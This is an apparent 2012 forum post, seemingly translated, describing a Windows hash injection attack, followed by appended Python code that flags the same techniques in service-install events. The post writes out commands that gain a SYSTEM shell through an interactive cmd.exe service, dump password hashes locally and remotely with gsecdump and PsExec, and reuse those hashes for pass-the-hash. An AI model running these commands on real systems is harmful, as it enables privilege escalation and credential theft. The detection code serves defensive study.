Hash injection attack
OP (original poster), posted on 2012-11-6 21:09:29
To get a DOS prompt as NT SYSTEM:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually never need the password cracked at all; this is just using the tool. As the original says, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I took a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
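Both techniques quoted in the post leave a trace a defender can look for: `sc create ... cmd.exe /K start` installs a service whose image is a command interpreter, and `psexec -s -c gsecdump.exe` installs PsExec's own remote service (PSEXESVC) on the target. The following is an added example, not code from the post or from the tools it names, showing triage logic that could run over Windows System-log "service installed" events (Event ID 7045). The event records are constructed for the example; the field names (ServiceName, ImagePath, ServiceType, StartType, AccountName) follow the 7045 event data, and the trusted-directory list is an assumption to adjust per environment.

```python
"""Triage Event ID 7045 (service installed) records for service-abuse patterns.

Added example, not part of the original post. Sample events are constructed.
"""
import re

# A service whose image is a shell is almost always an operator obtaining a
# SYSTEM prompt rather than a real service; treat these binaries as hostile.
INTERPRETERS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}

# Assumption: legitimate LocalSystem services normally run from these trees.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


def executable_from_image_path(image_path: str) -> str:
    """Return the executable part of an ImagePath with arguments stripped.

    Handles the quoted-whole form the post uses
    ('"C:\\WINDOWS\\system32\\cmd.exe /K start"') and unquoted paths with spaces.
    """
    m = re.match(r'\s*"?(.+?\.exe)\b', image_path, re.IGNORECASE)
    if m:
        return m.group(1)
    tokens = image_path.strip().strip('"').split()
    return tokens[0] if tokens else ""


def assess_service_install(event: dict) -> list:
    """Return the list of reasons a 7045 record looks like service abuse."""
    reasons = []
    exe = executable_from_image_path(event.get("ImagePath", ""))
    # Expand %SystemRoot% (as PsExec's service image uses it) and normalise case.
    exe_norm = re.sub(r"%systemroot%", r"c:\\windows", exe, flags=re.IGNORECASE).lower()
    base = re.split(r"[\\/]", exe_norm)[-1]

    if base in INTERPRETERS:
        reasons.append("image path is a command interpreter")
    # PsExec copies PSEXESVC.exe to the ADMIN$ share and registers it as a service.
    if base == "psexesvc.exe" or event.get("ServiceName", "").lower() == "psexesvc":
        reasons.append("PsExec remote-execution service")
    if event.get("AccountName", "").lower() == "localsystem" and not exe_norm.startswith(TRUSTED_DIRS):
        reasons.append("LocalSystem service outside trusted directories")
    return reasons


def scan(events: list) -> list:
    """Return (service name, reasons) for every record that triggers a rule."""
    flagged = []
    for event in events:
        reasons = assess_service_install(event)
        if reasons:
            flagged.append((event.get("ServiceName", "?"), reasons))
    return flagged


# Constructed 7045 records: the post's interactive cmd.exe service, the service
# PsExec installs on a remote host, and a benign print spooler for contrast.
SAMPLE_EVENTS = [
    {"ServiceName": "shellcmdline",
     "ImagePath": '"C:\\WINDOWS\\system32\\cmd.exe /K start"',
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler",
     "ImagePath": "C:\\WINDOWS\\system32\\spoolsv.exe",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

Note that the third rule is a heuristic layered on the two exact indicators: the cmd.exe service in the post lives under System32 and so is caught only by the interpreter rule, while PSEXESVC is caught both by name and by its location directly under the Windows directory. In production the same logic would be fed from the System log export rather than the inline sample records.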